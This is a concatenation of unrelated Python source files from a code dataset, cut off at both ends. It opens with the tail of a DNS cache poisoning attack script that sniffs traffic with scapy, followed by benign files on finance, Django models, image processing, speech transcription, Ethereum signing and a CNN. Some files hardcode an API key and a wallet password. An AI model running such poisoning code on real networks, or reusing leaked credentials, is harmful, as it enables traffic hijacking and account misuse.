open('/proc/sys/net/ipv4/ip_forward', 'w') as ipf:\n ipf.write('0\\n')\n print(\"Turned off auto forward pilot, switching to manual..\")\n except FileNotFoundError:\n pass\n\n self.stop = False\n self.thread = threading.Thread(target=self.sniff)\n self.thread.start()\n\n def sniff(self):\n \"\"\"\n Sniff the network with a stop_filter (@self.stopfilter)\n :return:\n \"\"\"\n print(\"Poisoning vic instead? : \" + str(self.pois_vic_instead))\n packets = sniff(prn=self.responder(self.auth_ip, self.rec_ip, self.mal_ip, self.domain, self.pois_vic_instead),\n stop_filter=self.stopfilter)\n if self.save:\n wrpcap('../pcap_files/' + str(datetime.now().time().strftime(\"%H_%M_%S\")) + '_DNS_cache_poisoning.pcap', packets)\n\n def stop_poisoning(self):\n \"\"\"\n Stop ARP cache poisoning\n :return:\n \"\"\"\n self.stop = True\n # self.stop_thread = threading.Thread(target=self.restore_network)\n\n def stopfilter(self, x):\n \"\"\"\n The stop filter\n :param x: a packet\n :return:\n \"\"\"\n if self.stop:\n return True\n else:\n return False\n","sub_path":"src/attacks/dns_attack.py","file_name":"dns_attack.py","file_ext":"py","file_size_in_byte":5163,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"344838240","text":"# coding=utf-8\nclass Bankcard(object):\n def __init__(self):\n self.id = 0\n self.time = 0\n self.user_id = 0\n self.rel_name = ''\n self.bank_name = ''\n self.bank_address = ''\n self.phone_num = ''\n self.bank_card_num = ''\n","sub_path":"mode/bankcard.py","file_name":"bankcard.py","file_ext":"py","file_size_in_byte":276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"114706197","text":"from django.db import models\n\n\nclass Film(models.Model):\n class Meta:\n verbose_name = u'Фильм'\n verbose_name_plural = u'Фильмы'\n\n def __str__(self):\n return self.title\n\n title = models.CharField(\n verbose_name=u'Название фильма',\n max_length=255,\n blank=False,\n )\n\n year = models.PositiveSmallIntegerField(\n verbose_name=u'Год выпуска',\n blank=False,\n )\n\n FORMAT_VHS = 'v'\n FORMAT_DVD = 'd'\n FORMAT_BLU = 'b'\n FORMAT_CHOICES = (\n (FORMAT_VHS, 'VHS'),\n (FORMAT_DVD, 'DVD'),\n (FORMAT_BLU, 'Blu-Ray'),\n )\n\n format = models.CharField(\n verbose_name=u'Формат',\n max_length=1,\n choices=FORMAT_CHOICES,\n )\n\n actors = models.ManyToManyField(\n 'Actor',\n verbose_name=u'Актеры',\n blank=True,\n )\n\n\nclass Actor(models.Model):\n class Meta:\n verbose_name = u'Актер'\n verbose_name_plural = u'Актеры'\n\n def __str__(self):\n return self.name\n\n name = models.CharField(\n verbose_name=u'Имя',\n max_length=255,\n blank=False,\n )\n","sub_path":"src/webby_test_api/filmsdb/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"549452102","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Oct 25 13:11:20 2020\n\n@author: aadi\n\"\"\"\n\nimport cv2\nimport numpy as np\nimport requests\n\nresponse = requests.post(\n 'https://api.remove.bg/v1.0/removebg',\n data={\n 'image_url': 'https://assets.myntassets.com/h_1440,q_90,w_1080/v1/assets/images/2272100/2018/2/19/11519021065151-Difference-of-Opinion-Men-Mustard-Printed-Round-Neck-T-shirt-1021519021064962-3.jpg',\n 'size': 'auto'\n },\n headers={'X-Api-Key': 'y5XdMgNewA7Wog1ZyXTj67sK'},\n)\nif response.status_code == requests.codes.ok:\n with open('1.png', 'wb') as out:\n out.write(response.content)\nelse:\n print(\"Error:\", response.status_code, response.text)\n\n\nmin_YCrCb = np.array([0,133,77],np.uint8)\nmax_YCrCb = np.array([235,173,127],np.uint8)\n\n# Get pointer to video frames from primary device\nimage = cv2.imread(\"1.png\")\nimageYCrCb = cv2.cvtColor(image,cv2.COLOR_BGR2YCR_CB)\nskinRegionYCrCb = cv2.inRange(imageYCrCb,min_YCrCb,max_YCrCb)\n\nskinYCrCb = cv2.bitwise_and(image, image, mask = skinRegionYCrCb)\n\ncv2.imwrite(\"1.png\", np.hstack([image,skinYCrCb]))\nimg = cv2.imread(\"1.png\")\nheight, width = img.shape[:2]\n\n# Cut the image in half\nwidth_cutoff = width // 2\ns1 = img[:, :width_cutoff]\ns2 = img[:, width_cutoff:]\n\n\n\n\ndif2 = cv2.absdiff(s1, s2)\ncv2.imwrite(\"final3.png\", dif2)\n\nheight, width = dif2.shape[:2]\n\n# Cut the image in 1/3rd\nh_cutoff = height// 3\ns2 = dif2[h_cutoff:,: ]\ncv2.imwrite(\"face2.png\", s2)\n","sub_path":"Ecommerce website/Holmes_404_Myntra-main/Myntra/MixAndMatch/ClothesExtract.py","file_name":"ClothesExtract.py","file_ext":"py","file_size_in_byte":1470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"253617263","text":"from actions.functions import *\n\n\ndef _welcome():\n print()\n print(\"*\"*21, \"Welcome\", \"*\"*21)\n print(\"*\" * 51)\n print(\"\\n1.-New register\")\n print(\"2.-Delete register\")\n print(\"3.-Search register\")\n print(\"4.-Exit\")\n\n try:\n op = int(input(\":\"))\n return op\n except Exception:\n _welcome()\n\n\nif __name__ == \"__main__\":\n option = 0\n while option != 4:\n option = _welcome()\n if option == 1:\n\n new_register()\n\n elif option == 2:\n\n delete_register()\n\n elif option == 3:\n\n search_register()\n\n elif option == 4:\n\n exit()\n\n else:\n\n print(\"Invalid option\")\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"248188911","text":"from google.cloud import storage\nfrom google.cloud import speech_v1p1beta1 as speech\nimport os\nimport io\nimport subprocess\nimport datetime\nimport math\n\n# Settings\nfilepath = os.path.expanduser(os.sep.join([\"~\", \"Downloads/for-transcript/\"])) # all files from this folder will be transcribed\noutput_filepath = os.path.expanduser(os.sep.join([\"~\", \"Downloads/transcripts/\"])) # ready text files will be in this folder\nbucketname = \"for-text-converting\" # your name here\nlanguage_code = 'en' # https://cloud.google.com/speech-to-text/docs/languages\nalternative_language_codes = [\n \"ru\",\n] # up to 6 codes here\nenable_speaker_diarization = True # set True if there are multiple speakers in audio files\n\n\ndef prepare_audio(filepath, audio_file_name):\n print(datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n + ' Converting audio… ', end=\"\", flush=True)\n current_file = filepath + audio_file_name\n destination_file = current_file.split('.')[0] + '.opus'\n subprocess.run(['ffmpeg', '-y', '-i', current_file, '-vn', '-acodec', 'libopus', '-ac', '1',\n '-b:a', '128k', '-ar', '48000', destination_file, '-loglevel', 'warning'])\n print('Done')\n audio_file_name = audio_file_name.split('.')[0] + '.opus'\n return audio_file_name\n\n\ndef upload_blob(bucket_name, source_file_name, destination_blob_name):\n print(datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n + ' Uploading, might take a while… ', end=\"\", flush=True)\n storage_client = storage.Client()\n bucket = storage_client.get_bucket(bucket_name)\n blob = bucket.blob(destination_blob_name)\n blob.upload_from_filename(source_file_name)\n print('Done')\n\n\ndef delete_blob(bucket_name, blob_name):\n storage_client = storage.Client()\n bucket = storage_client.get_bucket(bucket_name)\n blob = bucket.blob(blob_name)\n blob.delete()\n\ndef get_transcribing_time(file_name):\n p = subprocess.run(['ffprobe', '-v', \"error\", \"-show_entries\", \"format=duration\",\n \"-of\", \"default=noprint_wrappers=1:nokey=1\", file_name], capture_output=True)\n length = float(p.stdout)\n transcribing_time = math.ceil(length / 2 / 60) # on average, transcribing speed is 2x from duration\n return transcribing_time\n\ndef google_transcribe(audio_file_name):\n\n audio_file_name = prepare_audio(filepath, audio_file_name)\n file_name = filepath + audio_file_name\n audio_format = speech.enums.RecognitionConfig.AudioEncoding.OGG_OPUS\n sample_rate = 48000\n bucket_name = bucketname\n\n upload_blob(bucket_name, file_name, audio_file_name)\n\n gcs_uri = 'gs://' + bucketname + '/' + audio_file_name\n transcript = ''\n\n client = speech.SpeechClient()\n audio = speech.types.cloud_speech_pb2.RecognitionAudio(uri=gcs_uri)\n\n config = {\n \"enable_speaker_diarization\": enable_speaker_diarization,\n \"language_code\": language_code,\n \"alternative_language_codes\": alternative_language_codes,\n \"encoding\": audio_format,\n \"sample_rate_hertz\": sample_rate,\n }\n\n transcribing_time = get_transcribing_time(file_name)\n print(datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n + ' Transcribing, estimate waiting time is ' + str(transcribing_time) + ' min… ', end=\"\", flush=True)\n\n # Detects speech in the audio file\n operation = client.long_running_recognize(config, audio)\n response = operation.result(timeout=10000)\n result = response.results[-1]\n words_info = result.alternatives[0].words\n\n tag = 1\n speaker = \"\"\n\n for word_info in words_info:\n if word_info.speaker_tag == tag:\n speaker = speaker+\" \"+word_info.word\n else:\n transcript += \"speaker {}: {}\".format(tag, speaker) + \"\\n\"\n tag = word_info.speaker_tag\n speaker = \"\"+word_info.word\n\n transcript += \"speaker {}: {}\".format(tag, speaker)\n\n delete_blob(bucket_name, audio_file_name)\n os.remove(file_name)\n return transcript\n\n\ndef write_transcript(transcript_filename, transcript):\n f = open(output_filepath + transcript_filename,\n \"w+\", encoding=\"utf-8\", errors=\"ignore\")\n f.write(transcript)\n f.close()\n print('Done.')\n\n\nif __name__ == \"__main__\":\n for audio_file_name in os.listdir(filepath):\n exists = os.path.isfile(\n output_filepath + audio_file_name.split('.')[0] + '.txt')\n if exists:\n pass\n else:\n print(datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n + \" Starting file \" + audio_file_name)\n transcript = google_transcribe(audio_file_name)\n transcript_filename = audio_file_name.split('.')[0] + '.txt'\n write_transcript(transcript_filename, transcript)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"124577898","text":"def title_case(title, minor_words=''):\n title_words = title.split(' ')\n if title == '':\n return ''\n if minor_words == '':\n return ' '.join([x.capitalize() for x in title_words])\n fin = \"\"\n low_words = minor_words.split(' ')\n lw = [x.lower() for x in low_words]\n\n for i in range(len(title_words)):\n if i == 0 or title_words[i].lower() not in lw:\n fin += title_words[i].lower().capitalize()\n fin += ' '\n else:\n fin += title_words[i].lower()\n fin += ' '\n\n return fin[:-1]\n\n\ndef title_case2(title, minor_words=''):\n title = title.capitalize().split()\n minor_words = minor_words.lower().split()\n return ' '.join([word if word in minor_words else word.capitalize() for word in title])","sub_path":"6kyu/title_case.py","file_name":"title_case.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"22515542","text":"import csv\nfrom collections import namedtuple\n\nclass VanguardData:\n\n\tmutualFundAccts = []\n\tmutualFundTxns = []\n\tbrokerageAccts = []\n\tbrokerageTxns = []\n\tcompanyAccts = []\n\tcompanyAcctTxns = []\n\n\ndef read_csv_file(fileName):\n\twith open(fileName, 'r') as inputFile:\n\t\tdef remove_empty_terminal_fields(records) :\n\t\t\tfor record in records:\n\t\t\t\tif not record:\n\t\t\t\t\tyield ()\n\n\t\t\t\tif record and not record[-1]:\n\t\t\t\t\tdel(record[-1])\n\t\t\t\tyield tuple(record)\n\n\t\tcsvReader = csv.reader(inputFile)\n\t\trecordValues = list(remove_empty_terminal_fields(csvReader))\n\n\treturn recordValues\n\n\ndef process_records(fileRecords):\n\tRecordTypeList = namedtuple('RecordTypeList', \"RecordType,Values\")\n\tRecordMapping = namedtuple(\"RecordMapping\", \"Name,Header,Values\")\n\n\t# constant tuples for each record type header that may be in the file\n\tMF_ACCT = ('Fund Account Number', 'Fund Name', 'Price', 'Shares', 'Total Value')\n\n\tMF_TXN = ('Account Number', 'Trade Date', 'Process Date',\n\t\t'Transaction Type', 'Transaction Description', 'Investment Name',\n\t\t'Share Price', 'Shares', 'Gross Amount', 'Net Amount')\n\n\tBROKERAGE_ACCT = ('Account Number','Investment Name','Symbol','Shares','Share Price','Total Value')\n\n\tBROKERAGE_TXN = ('Account Number', 'Trade Date', 'Settlement Date',\n\t\t'Transaction Type', 'Transaction Description', 'Investment Name', 'Symbol',\n\t\t'Shares', 'Share Price', 'Principal Amount', 'Commission Fees', 'Net Amount',\n\t\t'Accrued Interest', 'Account Type')\n\n\tCOMPANY_ACCT = ('Plan Number','Plan Name','Fund Name','Shares','Price','Total Value')\n\n\tCOMPANY_ACCT_TXN = ('Account Number','Trade Date','Run Date','Transaction Activity','Transaction Description',\n\t\t'Investment Name','Share Price','Transaction Shares','Dollar Amount')\n\n\ttxns = VanguardData()\n\trecordMappings = [\n\t\tRecordMapping(\"MfAccount\", MF_ACCT, txns.mutualFundAccts),\n\t\tRecordMapping(\"MfTransaction\", MF_TXN, txns.mutualFundTxns),\n\t\tRecordMapping(\"BrokerageAccount\", BROKERAGE_ACCT, txns.brokerageAccts),\n\t\tRecordMapping(\"BrokerageTransaction\", BROKERAGE_TXN, txns.brokerageTxns),\n\t\tRecordMapping(\"CompanyAccount\", COMPANY_ACCT, txns.companyAccts),\n\t\tRecordMapping(\"CompanyAccountTransaction\", COMPANY_ACCT_TXN, txns.companyAcctTxns)\n\t]\n\n\t# build mapping of header record to named tuple type and value list for each record type\n\t# field names in tuple types are header field names with spaces removed\n\trecTypes = { (): None }\n\tfor mapping in recordMappings:\n\t\trecTypes[mapping.Header] = \\\n\t\t\tRecordTypeList(namedtuple(mapping.Name, [x.replace(' ','') for x in mapping.Header]), mapping.Values)\n\n\t#every record is either going to set the \"state\" or be added to the\n\t#appropriate list for that record type\n\tcurrentType = None\n\tfor rec in fileRecords:\n\t\tif rec in recTypes:\n\t\t\tcurrentType = recTypes[rec]\n\t\t\tcontinue\n\n\t\tif currentType != None:\n\t\t\tcurrentType.Values.append(currentType.RecordType._make(rec))\n\n\treturn txns\n","sub_path":"vanguard.py","file_name":"vanguard.py","file_ext":"py","file_size_in_byte":2878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"70309592","text":"import os\nimport sys\nPROGECT_ROOT = \"/\".join(os.path.dirname(os.path.abspath(__file__)).split(\"/\")[:-1])\nif PROGECT_ROOT not in sys.path:\n sys.path.append(PROGECT_ROOT)\nKEYS_ROOT = \"{}/keys\".format(PROGECT_ROOT)\nif not os.path.exists(KEYS_ROOT):\n os.makedirs(KEYS_ROOT, mode=0o755)\n\nimport node\nimport pickle\n\n\nCLEAR_TERMINAL = \"clear\"\n\n\nclass bcolors:\n PURPLE = '\\033[95m'\n BLUE = '\\033[94m'\n GREEN = '\\033[92m'\n YELLOW = '\\033[93m'\n RED = '\\033[91m'\n CLEAR = '\\033[0m'\n BOLDWHITE = '\\033[1m'\n UNDERLINE = '\\033[4m'\n\n\ndef show_accounts(exclude=0):\n accounts_template = \"\"\n i = 1\n for account in node.get_list_accounts():\n if i != exclude:\n accounts_template += \"Account #{3}{0}{4}: {1} | Balance: {2}.\\n\".format(\n i,\n account,\n node.get_balance(address=account),\n bcolors.YELLOW,\n bcolors.CLEAR\n )\n else:\n accounts_template += \"\\n\"\n i += 1\n template = \"\"\"\n \\r######## Accounts list ########\\n\n \\r{}\n \\r###############################\n \"\"\".format(accounts_template)\n print(template)\n\n\ndef show_enter_data(data):\n for key in data:\n print(\"{0}: {1}\".format(key.replace(\"_\", \" \"), transaction[key]))\n\n\nif __name__ == '__main__':\n # check_path_key()\n transaction = {}\n \"\"\"\n from\n \"\"\"\n os.system(CLEAR_TERMINAL)\n show_accounts()\n show_enter_data(transaction)\n number_from = 0\n while not (0 < number_from <= len(node.get_list_accounts())):\n try:\n number_from = int(input(\"Enter number account 'FROM' >> \"))\n except ValueError:\n print(\"Error enter number account 'FROM'.\")\n show_accounts()\n transaction[\"from\"] = node.get_list_accounts()[number_from-1]\n balance = node.get_balance(address=transaction.get(\"from\"))\n \"\"\"\n to\n \"\"\"\n os.system(CLEAR_TERMINAL)\n show_accounts(exclude=number_from)\n show_enter_data(transaction)\n number_to = 0\n while not (0 < number_to <= len(node.get_list_accounts()) and\n number_to != number_from):\n try:\n number_to = int(input(\"Enter number account 'TO' >> \"))\n except ValueError:\n print(\"Error enter number account 'TO'.\")\n show_accounts(exclude=number_from)\n transaction[\"to\"] = node.get_list_accounts()[number_to-1]\n \"\"\"\n money\n \"\"\"\n correct = False\n while not correct:\n \"\"\"\n gas price\n \"\"\"\n os.system(CLEAR_TERMINAL)\n show_accounts()\n show_enter_data(transaction)\n while not transaction.get(\"gasPrice\"):\n try:\n cost = int(input(\"Enter cost GAS >> \"))\n except ValueError:\n print(\"Error enter cost GAS.\")\n else:\n if (cost < balance):\n transaction[\"gasPrice\"] = cost\n else:\n print(\"Error enter cost GAS, there is not enough money to make a transaction\")\n key = input(\"Re-enter? [Y/n] >> \")\n if not key or key.lower() == \"y\":\n continue\n else:\n exit(-1)\n if not transaction.get(\"gasPrice\"):\n continue\n \"\"\"\n count gas\n \"\"\"\n os.system(CLEAR_TERMINAL)\n show_accounts()\n show_enter_data(transaction)\n while not transaction.get(\"gas\"):\n try:\n count = int(input(\"Enter count GAS for transaction >> \"))\n except ValueError:\n print(\"Error enter count GAS for transaction.\")\n else:\n if (count * transaction[\"gasPrice\"]) < balance:\n transaction[\"gas\"] = count\n else:\n print(\"Error enter coutn GAS, there is not enough money to make a transaction\")\n key = input(\"Re-enter? [Y/n] >> \")\n if not key or key.lower() == \"y\":\n continue\n else:\n exit(-1)\n if not transaction.get(\"gas\"):\n continue\n \"\"\"\n count wer\n \"\"\"\n os.system(CLEAR_TERMINAL)\n show_accounts()\n show_enter_data(transaction)\n while not transaction.get(\"value\"):\n try:\n count = int(input(\"Enter count WEI for transfer >> \"))\n except Exception:\n print(\"Error enter count WEI for transfer.\")\n else:\n if (count + transaction[\"gas\"] * transaction[\"gasPrice\"]) <= balance:\n transaction[\"value\"] = count\n correct = True\n else:\n print(\"Error enter count WEI, there is not enough money to make a transaction\")\n key = input(\"Re-enter? [Y/n] >> \")\n if not key or key.lower() == \"y\":\n continue\n else:\n exit(-1)\n if not transaction.get(\"value\"):\n continue\n os.system(CLEAR_TERMINAL)\n show_accounts()\n show_enter_data(transaction)\n\n transaction[\"nonce\"] = 12\n transaction[\"chainId\"] = '0x2a'\n \"\"\"\n keys\n \"\"\"\n key = node.get_private_key(name=transaction[\"from\"][2:], password=\"LbvfbDbnz2Xfirb\")\n s_transaction = node.sign_transaction(key=key, transaction=transaction)\n # node.node.personal.unlockAccount(transaction[\"from\"], \"XfirfNbcrbbJndthnrf1\")\n result = node.send_sign_transaction(transaction=s_transaction)\n print(result)\n\n\n\n if PROGECT_ROOT in sys.path:\n sys.path.remove(PROGECT_ROOT)\n","sub_path":"Test_etherium/signed_transaction.py","file_name":"signed_transaction.py","file_ext":"py","file_size_in_byte":5742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"630064597","text":"from django.core.management.base import BaseCommand, CommandError\nfrom ltmo.models import Leak\n\nclass Command(BaseCommand):\n \"\"\"docstring for Command\"\"\"\n def handle(self, *args, **kwargs):\n leaks = Leak.objects.all()\n for l in leaks:\n self.stderr.write(\"Updating %s\" % l.pk)\n try:\n l.save()\n except (Exception, ) as e:\n self.stderr.write('%s' %e)\n","sub_path":"ltmo/management/commands/update.py","file_name":"update.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"479564270","text":"import random\n\ncard_suits = [\"C\",\"S\",\"H\",\"D\"]\ncard_value = [\"A\", 2, 3, 4, 5, 6, 7, 8, 9, \"T\", \"J\", \"Q\", \"K\"]\ndeck = []\n\nfor i in card_suits:\n\tfor x in card_value:\n\t\tcard = str(x) + i\n\t\tdeck += [card]\nrandom.shuffle(deck)\nprint(deck)\n#print(len(deck))\n","sub_path":"environments/card_deck.py","file_name":"card_deck.py","file_ext":"py","file_size_in_byte":251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"65644666","text":"#!/usr/bin/env python\n#\n# Copyright (c) 2013 Kyle Gorman \n#\n# Permission is hereby granted, free of charge, to any person obtaining a\n# copy of this software and associated documentation files (the\n# \"Software\"), to deal in the Software without restriction, including\n# without limitation the rights to use, copy, modify, merge, publish,\n# distribute, sublicense, and/or sell copies of the Software, and to\n# permit persons to whom the Software is furnished to do so, subject to\n# the following conditions:\n#\n# The above copyright notice and this permission notice shall be included\n# in all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS\n# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF\n# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.\n# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY\n# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,\n# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE\n# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n#\n# pystatsbase.py: shared functions for the pystats package\n\nfrom __future__ import division\n\nfrom bisect import bisect_left\nfrom math import exp, fsum, log\nfrom operator import itemgetter\n\n# user methods\n\n\ndef mean(n):\n \"\"\"\n Compute the mean of a sequence n. This avoids accumalating floating\n point imprecision but an overflow isn't out of the question.\n\n >>> mean([0, 5, 10])\n 5.0\n \"\"\"\n return fsum(n) / len(n)\n\n\ndef median(n):\n \"\"\"\n Compute median using an algorith from Numerical Methods in C. For\n favorable benchmarks, see:\n\n >>> median([1, 5, 10])\n 5\n >>> median([1, 4, 5, 10])\n 4.5\n \"\"\"\n sorten = sorted(n)\n length = len(n)\n if length % 2 == 0:\n return (sorten[length // 2] + sorten[length // 2 - 1]) / 2\n else:\n return sorten[length // 2]\n\n\ndef quickmedian(n):\n \"\"\"\n Compute \"lower\" median efficiently using an algorithm from Numerical\n Recipes in C. For favorable benchmarks, see:\n\n http://ndevilla.free.fr/median/median/index.html\n\n >>> quickmedian([1, 4, 5, 10])\n 4\n \"\"\"\n low = 0\n high = len(n) - 1\n median = (low + high) // 2\n middle = 0\n ll = 0\n hh = 0\n while True:\n # end cases\n if high <= low: # one element left\n return n[median]\n if high == low + 1: # two elements left\n if (n[low] > n[high]):\n (n[low], n[high]) = (n[high], n[low])\n return n[median]\n # find median of all three bins and swap into low cell thereof\n middle = (low + high) // 2\n if n[middle] > n[high]:\n (n[middle], n[high]) = (n[high], n[middle])\n if n[low] > n[high]:\n (n[low], n[high]) = (n[high], n[low])\n if n[middle] > n[low]:\n (n[middle], n[low]) = (n[low], n[middle])\n # swap low element in middle cell into cell low + 1\n (n[middle], n[low + 1]) = (n[low + 1], n[middle])\n # nibble from each end towards the middle, swapping when stuck\n ll = low + 1\n hh = high\n while True:\n while n[low] > n[ll]:\n ll += 1\n while n[hh] > n[low]:\n hh -= 1\n if hh < ll:\n break\n (n[ll], n[hh]) = (n[hh], n[ll])\n # swap middle item in low cell back into correct position\n (n[low], n[hh]) = (n[hh], n[low])\n # reset active partition\n if hh <= median:\n low = ll\n if hh >= median:\n high = hh - 1\n\n\ndef rank(n):\n \"\"\"\n Return ranks for vector n\n \"\"\"\n (ivec, svec) = zip(*sorted(list(enumerate(n)), key=itemgetter(1)))\n sumranks = 0\n dupcount = 0\n newlist = [0] * len(n)\n for i in xrange(len(n)):\n sumranks += i\n dupcount += 1\n if i == len(n) - 1 or svec[i] != svec[i + 1]:\n averank = sumranks / dupcount + 1\n for j in xrange(i - dupcount + 1, i + 1):\n newlist[ivec[j]] = averank\n sumranks = 0\n dupcount = 0\n return newlist\n\n\ndef sample_variance(n):\n \"\"\"\n Nice effcient method (described somewhere on Wikipedia)\n \"\"\"\n y_squared_dot = sum(i * i for i in n)\n y_dot_squared = sum(n) ** 2\n return (y_squared_dot - y_dot_squared / len(n)) / (len(n) - 1)\n\n\ndef sse(n, mu):\n \"\"\"\n Returns sum of squared errors\n\n >>> sse([0, 5, 10], 0)\n 125.0\n \"\"\"\n return fsum((i - mu) ** 2 for i in n)\n\nif __name__ == '__main__':\n import doctest\n doctest.testmod()\n","sub_path":"pystatsbase.py","file_name":"pystatsbase.py","file_ext":"py","file_size_in_byte":4636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"369308892","text":"import numpy as np\nimport tensorflow as tf\nimport math\nfrom random import shuffle\nimport os\nimport random\nimport sys\nimport time\n\nsys.path.append('../')\nimport common.statics as stat\nimport tensorflow.contrib.slim as slim\n\n\n\n\ndef read_and_decode(filename_queue, batch_size):\n \n reader = tf.TFRecordReader()#\n _, serialized_example = reader.read(filename_queue)#\n features = tf.parse_single_example(\n serialized_example,\n # Defaults are not specified since both keys are required.\n features={\n 'content': tf.FixedLenFeature([], tf.string),\n 'label': tf.FixedLenFeature([], tf.string),\n })\n \n content = tf.decode_raw(features['content'], tf.float32)\n label = tf.decode_raw(features['label'], tf.float32)\n \n content = tf.reshape(content, [20,500,1024])\n label = tf.reshape(label, [1948])\n \n min_after_dequeue = 0\n capacity = min_after_dequeue + 3 * batch_size\n \n tcontent, tlabel = tf.train.shuffle_batch([content, label],\n batch_size=batch_size,\n capacity=16,\n num_threads=3,\n min_after_dequeue=min_after_dequeue)\n \n \n return tcontent, tlabel\n\n\nBatch_SIZE = 8\nN_EPOCH = 100\nTRAINTEST_RATIO = 0.8\n\ntf_record_path = '/media/ubuntu/65db2e03-ffde-4f3d-8f33-55d73836211a/dataset/ts_cases_dataset/cnn_enc'\n\ntrain_list = stat.loadfrompickle('t1t2_train_list.pickle')\ntest_list = stat.loadfrompickle('t1t2_test_list.pickle')\n\n\nwith tf.name_scope('Train_Batch'):\n train_filename_queue = tf.train.string_input_producer(train_list, num_epochs=N_EPOCH) \n tftrain_batch, tftrain_labels = read_and_decode(train_filename_queue, Batch_SIZE)\n\n\n \n learning_rate = tf.placeholder(tf.float32, shape=[], name='learning_rate')\n keep_prob = tf.placeholder(tf.float32, name='dropout_prob')\n is_training = tf.placeholder(tf.bool, name='is_training')\n \n \n def build_model(inputs):\n \n \n net = slim.repeat(inputs, 1, slim.conv2d, 1024 , [5, 1], scope='conv1')\n net = tf.nn.max_pool(net, [1,3, 1,1], [1,2,1,1], padding='VALID', name='pool1')\n net = slim.repeat(net, 1, slim.conv2d, 512 , [5, 1], scope='conv2')\n net = tf.nn.max_pool(net, [1,5, 1,1], [1,3,1,1], padding='VALID', name='pool2')\n net = slim.repeat(net, 1, slim.conv2d, 1024 , [2, 1], scope='conv3')\n net = tf.nn.max_pool(net, [1,2, 1,1], [1,2,1,1], padding='VALID', name='pool3')\n \n \n net = slim.repeat(net, 1, slim.conv2d, 1024, [1, 5], scope='conv4')\n net = tf.nn.max_pool(net, [1,1, 5,1], [1,1,3,1], padding='VALID', name='pool4')\n \n net = slim.repeat(net, 1, slim.conv2d, 1024, [1, 5], scope='conv5')\n net = tf.nn.max_pool(net, [1,1, 5,1], [1,1,3,1], padding='VALID', name='pool5')\n \n net = slim.repeat(net, 1, slim.conv2d, 1024, [1, 5], scope='conv6')\n net = tf.nn.max_pool(net, [1,1, 5,1], [1,1,3,1], padding='VALID', name='pool6')\n \n net = slim.repeat(net, 1, slim.conv2d, 1024, [1, 5], scope='conv7')\n net = tf.nn.max_pool(net, [1,1, 5,1], [1,1,3,1], padding='VALID', name='pool7')\n \n net = tf.reshape(net, [-1, int(np.prod(net.get_shape()[1:]))])\n \n \n fc6W = tf.Variable(tf.random_normal([5120,2048]), tf.float32)\n fc6b = tf.Variable(tf.random_normal([2048]), tf.float32)\n fc7W = tf.Variable(tf.random_normal([2048,2048]))\n fc7b = tf.Variable(tf.random_normal([2048]))\n fc8W = tf.Variable(tf.random_normal([2048,1948]))\n fc8b = tf.Variable(tf.random_normal([1948]))\n \n \n net = tf.nn.relu_layer(net, fc6W, fc6b , name='fc6') \n net = tf.layers.dropout(net, rate=keep_prob, training=is_training, name='dropout1')\n net = tf.nn.relu_layer(net, fc7W, fc7b, name='fc7')\n net = tf.layers.dropout(net, rate=keep_prob, training=is_training, name='dropout2')\n \n logits = tf.nn.xw_plus_b(net, fc8W, fc8b, name='fc8') \n return logits\n \n \n def calc_loss(logits, labels):\n \n os_label = tf.slice(labels, [0,0],[-1,93])\n cat_label = tf.slice(labels, [0,93],[-1,22])\n model_label =tf.slice(labels, [0,115],[-1,1833])\n \n os_logits = tf.slice(logits, [0,0],[-1,93])\n cat_logits = tf.slice(logits, [0,93],[-1,22])\n model_logits =tf.slice(logits, [0,115],[-1,1833])\n \n with tf.name_scope('Cross_Entropy_Loss'):\n \n loss_os = tf.nn.softmax_cross_entropy_with_logits(labels=os_label, logits=os_logits)\n loss_cat = tf.nn.softmax_cross_entropy_with_logits(labels=cat_label, logits=cat_logits)\n loss_model = tf.nn.softmax_cross_entropy_with_logits(labels=model_label, logits=model_logits)\n \n loss = tf.reduce_mean(loss_os + loss_cat + loss_model)\n \n return loss, [os_logits, cat_logits, model_logits], [os_label, cat_label, model_label]\n \nwith tf.device('/gpu:0'):\n \n with tf.variable_scope('cnn_reader') as scope:\n \n logits_for_train = build_model(tftrain_batch)\n\n\n with tf.name_scope('Optimizer'):\n \n loss, _, _ = 